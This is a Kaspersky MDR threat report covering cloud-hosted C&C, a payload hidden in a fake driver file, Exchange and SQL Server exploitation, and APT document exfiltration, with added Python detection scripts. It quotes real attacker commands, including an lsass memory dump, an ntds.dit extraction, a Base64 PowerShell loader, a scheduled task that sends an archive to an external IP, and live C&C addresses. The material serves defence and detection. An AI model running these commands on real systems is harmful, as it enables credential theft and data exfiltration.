
Server-side attacks, C&C in public clouds and other MDR cases we observed

Introduction

This report describes several interesting incidents observed by the Kaspersky Managed Detection and Response (MDR) team. The goal of the report is to inform our customers about techniques used by attackers. We hope that learning about the attacks that took place in the wild helps you to stay up to date on the modern threat landscape and to be better prepared for attacks.

Command and control via the public cloud

The use of public cloud services like Amazon, Azure or Google can make an attacker’s server difficult to spot. Kaspersky has reported several incidents where attackers used cloud services for C&C.

Case #1: Cloudflare Workers as redirectors

Case description

The incident started with Kaspersky MDR detecting the use of a comprehensive toolset for security assessment, presumably Cobalt Strike, by an antimalware (AM) engine memory scan (MEM:Trojan.Win64.Cobalt.gen). The memory space belongs to the process c:\windows\system32\[legitimate binary name][1].exe.

While investigating, we found that the process had initiated network connections to a potential C&C server:

hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/jquery/secrets/[random sequence]
hXXps://blue-rice-1d8e.dropboxonline.workers[.]dev/mails/images/[cut out]?_udpqjnvf=[cut out]

The URL format indicates the use of Cloudflare Workers.

We then found that earlier, the binary had unsuccessfully[2] attempted to execute an lsass.exe memory dump via comsvcs.dll:

CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\[filename].doc full

Several minutes later, a suspicious .bat script was run. This created a suspicious WMI consumer, later classified by MDR as an additional persistence mechanism.

The incident was detected in a timely manner, so the attacker did not have the time to follow through. The attacker’s final goals are thus unknown.
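Command lines like the one above defeat a literal match because cmd.exe carets and mixed case split the keywords; the T1003.001 detection entry further down relies on a regex over a normalized command line. The Python below is an added example, not code from the report or from Kaspersky, of that normalize-then-match logic run over constructed sample command lines; it also pulls out the MiniDump target argument, since a hard-coded PID hides which process is being dumped.

```python
import re

# Constructed sample process-start command lines (not telemetry from the report).
SAMPLE_COMMAND_LINES = [
    # Same shape as the command in the case: a for-loop resolves the lsass PID via tasklist,
    # and batch "^" escapes sit in front of the loop variables
    r"""CMd.exE /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\[filename].doc full""",
    # Caret-split keywords and a hard-coded PID, so the string "lsass" never appears
    r"cmd /c rund^ll32 comsvcs.dll, Mini^Dump 624 C:\temp\out.bin full",
    # Benign rundll32 and comsvcs.dll usage, which must not alert
    r"rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl",
    r"regsvr32 /s C:\Windows\System32\comsvcs.dll",
]

# Matches "comsvcs.dll, MiniDump" with any spacing, and "comsvcs, MiniDump" without the extension
MINIDUMP_RE = re.compile(r"comsvcs(?:\.dll)?\s*,?\s*minidump\b")
# The PID argument that follows the MiniDump export (a number, or a batch variable)
DUMP_TARGET_RE = re.compile(r"minidump\s+(\S+)")
LSASS_RE = re.compile(r"\blsass\b")
# A "for /f ... tasklist" loop resolves the PID at run time
PID_LOOKUP_RE = re.compile(r"for /f .*tasklist")


def normalize(cmdline: str) -> str:
    """Undo the escaping tricks that defeat a literal match: drop cmd.exe carets,
    collapse runs of whitespace and lower-case everything."""
    s = cmdline.replace("^", "")
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def classify(cmdline: str) -> dict:
    """Return detection flags for one process-start command line."""
    n = normalize(cmdline)
    minidump = MINIDUMP_RE.search(n) is not None
    target = DUMP_TARGET_RE.search(n)
    return {
        "comsvcs_minidump": minidump,
        # Explicit lsass reference, or a tasklist lookup that resolves the PID at run time
        "lsass_indicated": minidump
        and (LSASS_RE.search(n) is not None or PID_LOOKUP_RE.search(n) is not None),
        # A bare numeric PID has to be resolved against process telemetry to learn the real target
        "dump_target": target.group(1) if (minidump and target) else None,
        "caret_escaped": "^" in cmdline,
    }


def suspicious_lines(cmdlines):
    """Filter a batch of command lines down to those invoking comsvcs.dll MiniDump."""
    return [c for c in cmdlines if classify(c)["comsvcs_minidump"]]


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(classify(line))
```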

Case detection

The list below gives the signs of suspicious activity that were the starting point for the investigation by the SOC. Each entry gives the MITRE ATT&CK technique, the MDR telemetry event type used, the detection details and a description.

T1588.002: Tool
  • Telemetry: AM engine detection on beacon
  • Detection details: AM verdict MEM:Trojan.Win64.Cobalt.gen, which can be used for Cobalt Strike or Meterpreter
  • Description: A malicious payload was executed in the victim’s system and started communicating with the C&C server

T1620: Reflective Code Loading
  • Telemetry: AM detection in memory
  • Detection details: AM verdict MEM:Trojan.Win64.Cobalt.gen
  • Telemetry: Process injection
  • Detection details: Detection of code injection from an unknown binary into a system binary
  • Description: The malicious payload migrated to the victim’s memory

T1071.001: Web Protocols
  • Telemetry: HTTP connection; Process start
  • Detection details: Suspicious HTTP connections to the malicious URL blue-rice-1d8e[.]dropboxonline.workers.dev/… from a non-browser process with a system integrity level
  • Description: The attacker’s communications with the C&C server

T1584.006: Web Services
  • Telemetry: HTTP connection
  • Detection details: URL reputation, regular expression in URL
  • Description: The attacker’s communications with the C&C server

T1102.001: Dead Drop Resolver
  • Telemetry: HTTP connection
  • Detection details: URL reputation, regular expression in URL
  • Description: The attacker’s communications with the C&C server

T1003.001: LSASS Memory
  • Telemetry: AM detection on suspicious activity
  • Detection details: AM detection on lsass memory access
  • Telemetry: Process start
  • Detection details: Regex on a command line like rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump lsass.dmp full
  • Description: The attacker’s unsuccessful attempt to dump the lsass.exe memory to a file

T1546.003: Windows Management Instrumentation Event Subscription
  • Telemetry: Windows event; WMI activity
  • Detection details: WMI active script event consumer created remotely
  • Description: The attacker gained persistence through active WMI

Payload hidden in long text

Case #1: A scheduled task that loads content from a long text file

Case description

This case started with a suspicious scheduled task. The listing below should give you a general idea of the task and the command it executes.

Scheduled task:

\Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A311AA10-BBF3-4CDE-A00B-AAAAB3136D6A}, C:\Windows\System32\Tasks\Microsoft\Windows\Management\Provisioning\YLepG5JS\075C8620-1D71-4322-ACE4-45C018679FC9

Command:

"wscript.exe" /e:vbscript /b "C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys'), 1874201, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"

The scheduled task invokes a VBS script (file path: C:\Windows\System32\r4RYLepG5\9B2278BC-F6CB-46D1-A73D-5B5D8AF9AC7C, MD5 106BC66F5A6E62B604D87FA73D70A708), which reads a 422-byte slice starting at offset 1874201 of the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys, Base64-decodes it and executes the result as a PowerShell script block.

The VBS script mimics the content and behavior of the legitimate C:\Windows\System32\SyncAppvPublishingServer.vbs file, but the path and file name are different.

The customer approved our MDR SOC analyst’s request to analyze the file C:\Windows\System32\drivers\S2cZVnXzpZ\02F4F239-0922-49FE-A338-C7460CB37D95.sys. A quick analysis revealed a Base64-encoded payload inside long text content.

The decoded payload contained a link to a C&C server.

Further telemetry analysis showed that the infection was probably caused by the following process, likely a malicious activator (MD5 F0829E688209CA94305A256B25FEFAF0):

C:\Users\<… cut out … >\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe

The activator was downloaded with the Tixati BitTorrent client and executed by a member of the local Administrators group.

Fortunately, the telemetry analysis did not reveal any evidence of malicious activity from the discovered C&C server (counter[.]wmail-service[.]com), which would have allowed downloading further stages of infection. In the meantime, a new AM engine signature was released, and the malicious samples are now detected as Trojan-Dropper.Win64.Agent.afp (F0829E688209CA94305A256B25FEFAF0) and Trojan.PowerShell.Starter.o (106BC66F5A6E62B604D87FA73D70A708). The C&C URL was correctly classified as malicious.
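The loader command line in this case carries everything a detection needs: the carrier file path, the byte offset and the length of the Base64 slice. The Python below is an added example, not code from the report or from Kaspersky, that parses that pattern out of an autostart entry, checks that the carrier is plain text rather than a PE driver, and decodes the slice; the loader path, carrier path and payload are constructed stand-ins.

```python
import base64
import re
import string

# Loader pattern from the case: ReadAllBytes('<carrier>'), <offset>, <count> ... FromBase64String
LOADER_RE = re.compile(
    r"ReadAllBytes\('(?P<path>[^']+)'\)\s*,\s*(?P<offset>\d+)\s*,\s*(?P<count>\d+)\s*\)"
    r".*?FromBase64String",
    re.IGNORECASE | re.DOTALL,
)
# Cmdlets that mark the decoded text as PowerShell meant to be run, not data
PS_INDICATOR_RE = re.compile(r"(?i)\b(?:IEX|Invoke-\w+|New-Object|DownloadString|FromBase64String)\b")
PRINTABLE = frozenset(string.printable.encode("ascii"))

# Constructed payload and carrier; in the case the carrier was a 1.8 MB ".sys" file made of text
SAMPLE_PAYLOAD = "Invoke-Command -ScriptBlock { Write-Output 'constructed sample payload' }"


def build_sample_carrier():
    """Bury the Base64 payload inside filler text; return (bytes, offset, count)."""
    filler = "".join(f"filler text line {i}\n" for i in range(200)).encode("ascii")
    blob = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-8"))
    data = filler + blob + b"\n" + b"more filler text\n" * 20
    return data, len(filler), len(blob)


SAMPLE_CARRIER, SAMPLE_OFFSET, SAMPLE_COUNT = build_sample_carrier()
# Same shape as the scheduled-task command in the case, with constructed paths
SAMPLE_CMDLINE = (
    '"wscript.exe" /e:vbscript /b "C:\\Windows\\System32\\loader.vbs" '
    '"n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('
    "'C:\\Windows\\System32\\drivers\\carrier.sys'), {offset}, {count}); "
    "$sc2 = [Convert]::FromBase64String($sc); "
    "$sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); "
    'Invoke-Command ([Scriptblock]::Create($sc3))"'
).format(offset=SAMPLE_OFFSET, count=SAMPLE_COUNT)


def parse_loader(cmdline: str):
    """Extract carrier path, offset and count from the loader command line, or None."""
    m = LOADER_RE.search(cmdline)
    if m is None:
        return None
    return {"path": m.group("path"), "offset": int(m.group("offset")), "count": int(m.group("count"))}


def looks_like_text(data: bytes, sample: int = 4096) -> bool:
    """A real driver starts with an MZ header; a payload carrier is printable text."""
    head = data[:sample]
    if head.startswith(b"MZ"):
        return False
    return all(b in PRINTABLE for b in head)


def extract_payload(data: bytes, offset: int, count: int):
    """Decode the slice the loader reads; None if it is not valid Base64/UTF-8."""
    try:
        return base64.b64decode(data[offset:offset + count], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str, carrier: bytes) -> dict:
    """Tie the autostart command line to the carrier file it reads."""
    loader = parse_loader(cmdline)
    if loader is None:
        return {"loader_pattern": False}
    payload = extract_payload(carrier, loader["offset"], loader["count"])
    return {
        "loader_pattern": True,
        "carrier_path": loader["path"],
        "carrier_is_text": looks_like_text(carrier),
        "decoded_payload": payload,
        "payload_is_powershell": payload is not None and PS_INDICATOR_RE.search(payload) is not None,
    }
```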

Case detection

The list below gives the attack techniques and how they were detected by Kaspersky MDR. Each entry gives the MITRE ATT&CK technique, the MDR telemetry event type used, the detection details and a description.

T1547.001: Registry Run Keys / Startup Folder
  • Telemetry: Autostart entry
  • Detection details: Regex on autostart entry details
  • Telemetry: AM detection
  • Detection details: Heuristic AM engine verdict HEUR:Trojan.Multi.Agent.gen
  • Description: Malicious persistence

T1059.001: PowerShell
  • Telemetry: Autostart entry
  • Detection details: Regex on autostart entry details
  • Description: Execution of PowerShell code via “ScriptBlock” instead of “Invoke-Expression”

T1216.001: System Script Proxy Execution
  • Telemetry: Process start
  • Detection details: Regex on command line
  • Description: Malicious payload execution via C:\Windows\System32\SyncAppvPublishingServer.vbs

T1204.002: Malicious File
  • Telemetry: Process start
  • Detection details: Execution sequence svchost.exe → explorer.exe → patch.exe from the directory C:\Users\<…cut…>\Downloads\ExcelAnalyzer 3.4.3\crack
  • Telemetry: Local file operation
  • Detection details: Creation of c:\users\<…cut…>\downloads\excelanalyzer 3.4.3\setup_excelanalyzer.exe, in this order: chrome.exe → tixati.exe
  • Telemetry: Local file operation
  • Detection details: Creation of 02f4f239-0922-49fe-a338-c7460cb37d95.sys, in this order: svchost.exe → patch.exe; process command line “C:\Users\<…cut…>\Downloads\ExcelAnalyzer 3.4.3\crack\Patch.exe”. The contents of 02f4f239-0922-49fe-a338-c7460cb37d95.sys do not match the extension (text instead of binary).
  • Description: The user executed a file downloaded by the Tixati BitTorrent client. As a result, the file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was created.

T1027: Obfuscated Files or Information
T1140: Deobfuscate/Decode Files or Information
  • Detection details: The suspicious file 02f4f239-0922-49fe-a338-c7460cb37d95.sys was requested from the customer via an MDR response. It contained text; starting on line 4890, it contained a Base64-encoded payload.
  • Description: The attacker hid the payload

T1071.001: Web Protocols
  • Telemetry: HTTP connection; Network connection
  • Detection details: The SOC checked for successful connections to the discovered C&C server.
  • Description: A search for the attacker’s possible attempts to execute further stages of the attack

Server-side attacks on the perimeter

Case #1: A ProxyShell vulnerability in Microsoft Exchange

Case description

During manual threat hunting, the Kaspersky SOC team detected suspicious activity on a Microsoft Exchange server: the process MSExchangeMailboxReplication.exe attempted to create several suspicious files:

\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rqfja.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\yjiba.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\jiwkl.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\qwezb.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\qspwi.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\scripts\premium\upxnl.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\qikyp.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\current\themes\resources\jvdyt.aspx
c:\program files\microsoft\exchange server\v15\frontend\httpproxy\ecp\auth\mgsjz.aspx

The ASPX file format, which the service should not create, and the random file names led our SOC analyst to believe that those files were web shells.

Telemetry analysis of the suspicious file creation attempts showed that Kaspersky Endpoint Security (KES) had identified the process behavior as PDM:Exploit.Win32.Generic and blocked some of the activities.

Similar behavior was detected the next day, this time an attempt at creating one file:

\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\rmvbe.aspx

KES had blocked the exploitation attempts. Nonetheless, the attempts themselves indicated that the Microsoft Exchange server was vulnerable and in need of patching as soon as possible.

Case detection

The list below gives the attack techniques and how these were detected by Kaspersky MDR. Each entry gives the MITRE ATT&CK technique, the MDR telemetry event type used, the detection details and a description.

T1190: Exploit Public-Facing Application
  • Telemetry: AM detection
  • Detection details: Heuristic AM engine verdict PDM:Exploit.Win32.Generic
  • Description: Exploitation attempt

T1505.003: Web Shell
  • Telemetry: Local file operation
  • Detection details: Attempts at creating ASPX files using the MSExchangeMailboxReplication.exe process
  • Description: Web shell file creation

Case #2: MS SQL Server exploitation

Case description

The incident was detected due to suspicious activity exhibited by sqlservr.exe, a legitimate Microsoft SQL Server process. At the time of detection, the account active on the host was S-1-5-21—-181797 (Domain / username).

The SQL Server process attempted to create a suspicious file:

c:\windows\serviceprofiles\mssql$sqlexpress\appdata\local\temp\tmpd279.tmp

We observed that a suspicious assembly, db_0x2D09A3D665536_fscbd (MD5 383D20DE8F94D12A6DED1E03F53C1E16, original file name evilclr.dll), had been loaded into the SQL Server process (c:\program files\microsoft sql server\mssql15.sqlexpress\mssql\binn\sqlservr.exe).

The file was detected by the AM engine as HEUR:Trojan.MSIL.Starter.gen and Trojan.Multi.GenAutorunSQL.b.

The SQL Server host had previously been seen to be accessible from the Internet and in the process of being scanned from the TOR network.

After the suspicious assembly load, the AM engine detected execution of malicious SQL jobs. The SQL jobs contained obfuscated PowerShell commands.

The created SQL jobs attempted to connect to a number of URLs on high-numbered ports.


Some of the IP addresses were already on the deny list, while others were added in response to this incident.

We were not able to observe any other host within the monitoring scope attempt to connect to these IP addresses, which confirmed that the attack was detected at an early stage.

The next day, the same activity, with the same verdicts (HEUR:Trojan.MSIL.Starter.gen, Trojan.Multi.GenAutorunSQL.b), was detected on another SQL Server host, which was also accessible from the Internet.

Since the attack was detected in time, and its further progress was blocked by the AM engine, the attacker was not able to proceed, while the customer corrected the network configuration errors to block access to the server from the Internet.

Case detection

The list below gives the attack techniques and how these were detected by Kaspersky MDR. Each entry gives the MITRE ATT&CK technique, the MDR telemetry event type used, the detection details and a description.

T1090.003: Multi-hop Proxy
T1595.002: Vulnerability Scanning
  • Telemetry: Network connection; AM detection
  • Detection details: Reputation analysis showed the use of the TOR network for scanning. The scanning activity was detected through network connection analysis and by the AM engine.
  • Description: The attacker scanned the SQL Server host

T1190: Exploit Public-Facing Application
  • Telemetry: Process start
  • Detection details: The server application sqlservr.exe launched powershell.exe, in the following order: services.exe → sqlservr.exe → powershell.exe
  • Telemetry: Autostart entry
  • Detection details: Execution of the object previously detected as an autostart entry with a bad reputation: sql:SQLEXPRESS\db_0x2D09A3D665537_fscbd; original file name: evilclr.dll
  • Description: The attacker successfully exploited the SQL server

T1059.001: PowerShell
  • Telemetry: Autostart entry; Process start
  • Detection details: Command line analysis showed the use of PowerShell.
  • Description: Malicious persistence via an SQL Server job

T1027: Obfuscated Files or Information
  • Telemetry: Autostart entry
  • Detection details: Regex- and ML-based analysis of the SQL Server Agent job command line
  • Telemetry: Process start
  • Detection details: Regex- and ML-based analysis of the command line in the services.exe → sqlservr.exe → powershell.exe execution sequence
  • Description: The attacker attempted to evade detection

T1505.001: SQL Stored Procedures
  • Telemetry: Autostart entry
  • Detection details: SQL Server Agent job analysis
  • Telemetry: AM detection; AM detection on suspicious activity
  • Detection details: Heuristic detection of PowerShell in a SQL Server Agent job; verdict: HEUR:Trojan.Multi.Powecod.a
  • Description: Malicious persistence via an SQL Server job

T1071.001: Web Protocols
  • Telemetry: HTTP connection; AM detection
  • Detection details: The URL reputation as well as an AM generic heuristic verdict similar to HEUR:Trojan.Multi.GenBadur.genw pointed to the use of a malicious C&C server.
  • Description: The attacker’s C&C server

What does exfiltration in a real-life APT look like?

Case #1: Collecting and stealing documents

Case description

Kaspersky MDR detected suspicious activity on one particular host in the customer’s infrastructure: the following process was started remotely by psexec:

“cmd.exe” /c “c:\perflogs\1.bat”, which started:

findstr "10.<…cut…>.
wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username1>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1
wevtutil qe security /rd:true /f:text /q:"*[EventData/Data[@Name='TargetUserName']='<username2>'] and *[System[(EventID=4624) or (EventID=4623) or (EventID=4768) or (EventID=4776)]]" /c:1

After that, the following inventory commands were executed by the binary C:\ProgramData\USOPrivate\UpdateStore\windnphd.exe:

C:\Windows\system32\cmd.exe /C ping 10.<…cut…> -n 2
query user
C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password>
C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>
C:\Windows\system32\cmd.exe /C net group "domain admins" /domain
C:\Windows\system32\cmd.exe /C ping <hostname1>
C:\Windows\system32\cmd.exe /C vssadmin list shadows
C:\Windows\system32\cmd.exe /C ipconfig /all
C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$

Suspicious commands triggering actions in the Active Directory database were executed:

C:\Windows\system32\cmd.exe /C ntdsutil snapshot "activate instance ntds" create quit
C:\Windows\system32\cmd.exe /C dir c:\windows\system32\ntds.dit
C:\Windows\system32\cmd.exe /C dir c:\
C:\Windows\system32\cmd.exe /C dir c:\windows\ntds\ntds.dit

After these commands were executed, the windnphd.exe process started an HTTP connection:

hxxp[:]//31.192.234[.]60:53/useintget

Then a suspicious file, c:\users\public\nd.exe (MD5 AAE3A094D1B019097C7DFACEA714AB1B), created by the windnphd.exe process, executed the following commands:

nd.exe c:\windows\system32\config\system c:\users\public\sys.txt
nd.exe c:\windows\ntds\ntds.dit c:\users\public\nt.txt
C:\Windows\system32\cmd.exe /C move *.txt c:\users\public\tmp
C:\Windows\system32\cmd.exe /C rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp
rar.exe a -k -r -s -m1 c:\users\public\n.rar c:\users\public\tmp

Later, the SOC observed that a suspicious scheduled task had been created on the same host:

schtasks /create /sc minute /mo 30 /ru system /tn tmp /tr "c:\users\public\s.exe c:\users\public\0816-s.rar 38[.]54[.]14[.]183 53 down" /f

The task executed a suspicious file, c:\users\public\s.exe (MD5 6C62BEED54DE668234316FC05A5B2320).

This executable used the archive c:\users\public\0816-s.rar and the suspicious IP address 38[.]54[.]14[.]183, located in Vietnam, as parameters.

The 0816-s.rar archive was created via remote execution of the following command through psexec:

rar a -k -r -s -ta[Pass_in_clear_text] -m1 c:\users\public\0816-s.rar "\\10.<…cut…>\c$\users\<username4>\Documents\<DocumentFolder1>"

After that, we detected a suspicious network connection to the IP address 38[.]54[.]14[.]183 from the s.exe executable. The activity looked like an attempt to transfer the data collected during the attack to the attacker’s C&C server.

Similar suspicious behavior was detected on another host.

First, a suspicious file was created over the SMB protocol: c:\users\public\winpdasd.exe (MD5: B83C9905F57045110C75A950A4EE56E4).

Next, a task was created remotely via psexec.exe:

schtasks /create /sc minute /mo 30 /ru system /tn tmp /tr "c:\users\public\winpdasd.exe" /f

During task execution, an external network communication was detected, and certain discovery commands were executed:

hxxp://31[.]192.234.60:53/useintget
ping 10.<…cut…> -n 1
query user
net use

This was followed by a connection to a network share on the host 10.<…cut…> as <username3>:

C:\Windows\system32\cmd.exe /C net use \\10.<…cut…>\ipc$ "<password>" /u:<domain>\<username3>

More reconnaissance command executions were detected:

C:\Windows\system32\cmd.exe /C dir \\10.<…cut…>\c$\users\<username4>\AppData\Roaming\Adobe\Linguistics
C:\Windows\system32\cmd.exe /C tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password> |findstr rundll32.exe
tasklist /S 10.<…cut…> -U <domain>\<username3> -P <password>
C:\Windows\system32\cmd.exe /C taskkill /S 10.<…cut…> -U <domain>\<username3> -P <password> /pid <PID> /f
C:\Windows\system32\cmd.exe /C schtasks /run /s 10.<…cut…> /u <domain>\<username3> /p "<password>" /tn Microsoft\Windows\Tcpip\dcrpytod

Then winpdasd.exe created the file windpchsvc.exe (MD5: AE03B4C183EAA7A4289D8E3069582930) and set it up as a task:

C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 30 /ru system /tn Microsoft\Windows\Network\windpch /tr "C:\Users\admin\AppData\Roaming\Microsoft\Network\windpchsvc.exe" /f

After that, C&C communications were detected:

hxxp://139.162.35[.]70:53/micsoftgp

This incident, a fragment of a long-running APT campaign, demonstrates a data collection scenario. It shows that the attacker’s final goal was to spy on and monitor the victim’s IT infrastructure. Another feature of targeted attacks that can be clearly seen from this incident is the use of custom tools. An analysis of these is given later in this report as an example.

Case detection

The list below gives the attack techniques and how these were detected by Kaspersky MDR. Each entry gives the MITRE ATT&CK technique, the MDR telemetry event type used, the detection details and a description.

T1569.002: Service Execution
  • Telemetry: Process start
  • Detection details: Command line analysis
  • Telemetry: Windows event
  • Detection details: Windows events on service installation and service start
  • Description: The attacker performed reconnaissance and a search in local logs. The attacker persisted in the victim’s system through service creation
  • Telemetry: AM detection on suspicious activity
  • Detection details: AM behavior analysis
  • Description: The attacker executed windnphd.exe through psexec

T1592: Gather Victim Host Information
T1590: Gather Victim Network Information
  • Telemetry: Process start
  • Detection details: Command line analysis
  • Description: The attacker performed internal reconnaissance

T1021.002: SMB/Windows Admin Shares
  • Telemetry: Share access
  • Detection details: Inbound and outbound share access
  • Description: The attacker tried to access \\10.<…cut…>.65\ipc$ and \\10.<…cut…>.52\c$

T1003.003: NTDS
  • Telemetry: Process start
  • Detection details: Command line analysis
  • Description: The attacker accessed NTDS.dit with ntdsutil

T1071.001: Web Protocols
  • Telemetry: HTTP connection; Network connection
  • Detection details: The SOC checked if the data transfer was successful
  • Telemetry: AM detection on suspicious activity
  • Detection details: The connection was initiated by the suspicious process windnphd.exe
  • Description: The attacker communicated with the C&C server at hxxp[:]//31.192.234[.]60:53/useintget

T1571: Non-Standard Port
  • Telemetry: HTTP connection; Network connection
  • Detection details: The SOC detected the use of the HTTP protocol on the non-standard 53/TCP port
  • Description: The attacker used the C&C server hxxp[:]//31.192.234[.]60:53/useintget

T1587.001: Malware
  • Telemetry: Local file operation; Process start; AM detection on suspicious activity
  • Detection details: Use of various suspicious binaries prepared by the attacker specifically for this attack
  • Description: The attacker used custom tools: s.exe, winpdasd.exe, windpchsvc.exe (see the detailed analysis below)

T1497: Virtualization/Sandbox Evasion
  • Telemetry: Malware analysis
  • Detection details: Detected the HookSleep function (see below)
  • Description: The attacker attempted to detect sandboxing. The emulation detection was found in the custom tools winpdasd.exe and windpchsvc.exe

T1036.005: Match Legitimate Name or Location
  • Telemetry: Local file operation; Malware analysis
  • Detection details: Operations with the file c:\users\Default\ntusers.dat
  • Description: The attacker attempted to hide shellcode inside a file with a name similar to the legitimate ntuser.dat

T1140: Deobfuscate/Decode Files or Information
  • Telemetry: Local file operation; Malware analysis
  • Detection details: The file ntusers.dat contained encoded shellcode, which was later executed by winpdasd.exe and windpchsvc.exe
  • Description: The attacker executed arbitrary code

T1560.001: Archive via Utility
  • Telemetry: Process start
  • Detection details: Use of the RAR archiver for data collection
  • Description: The attacker archived the stolen credentials and documents

T1048.003: Exfiltration Over Unencrypted Non-C2 Protocol
  • Telemetry: Process start
  • Detection details: Command line analysis
  • Telemetry: Network connection
  • Detection details: Analysis of the process that initiated the connection
  • Description: The attacker used a custom tool to exfiltrate data

An analysis of the custom tools used by the attacker

windpchsvc.exe and winpdasd.exe

Both malware samples are designed to extract a payload from a file, decode it, and directly execute it via a function call. The payload is encoded shellcode.

Both files read from a file whose name is intended to deceive investigators and users by following naming conventions similar to those of system files:

Payload file for windpchsvc.exe

The malware, windpchsvc.exe, reads from the file c:\users\Default\ntusers.dat. A legitimate file, named ntuser.dat, exists in this location. Note that the bona fide registry file does not contain an ‘s’.

A similar file name was used for the winpdasd.exe malware:

Payload file for winpdasd.exe

The malware reads from this file and decodes the bytes for direct execution via a function call, as seen below (call [ebp+payload_alloc] and call esi):

windpchsvc.exe: decode, allocate memory, copy to mem, execute

winpdasd.exe: decode, allocate memory, copy to mem, execute via function call

The payload files (ntusers.dat) contain the main logic, while the samples we analyzed are just the loaders.

Some of the images show a function that I labeled “HookSleep” and which might be used for sandbox evasion in other forms of this malware. The function has no direct effect on the execution of the payload.

The decompiled function can be seen below:

The “HookSleep” function found in both files, decompiled

When debugging, this worked as expected. The Win32 Sleep function is redirected to the function defined in the malware:

The Sleep function redirected back to the malware code

s.exe

This file can be classified as a simple network transfer tool capable of uploading or downloading. The basic parameters are as follows:

s.exe <file> <IP address> <port> <up|down>

This is basically netcat without all the features. The benefit of this is that it does not draw as much attention as netcat. In fact, while testing, we found that netcat, when set to listen, was able to receive a file from this sample and write it to a file (albeit with some added junk characters in the results). We also found that the sample was incapable of executing anything after a download or upload.

The algorithm is pretty simple: network startup, parse arguments, create socket, then send the file or wait for a file depending on the arguments. The decompiled main function can be seen below:

Decompiled network transfer tool

[1] The actual name of the binary is unimportant; hence it was skipped.
[2] Kaspersky Endpoint Security efficiently protects LSASS memory.

Source: Securelist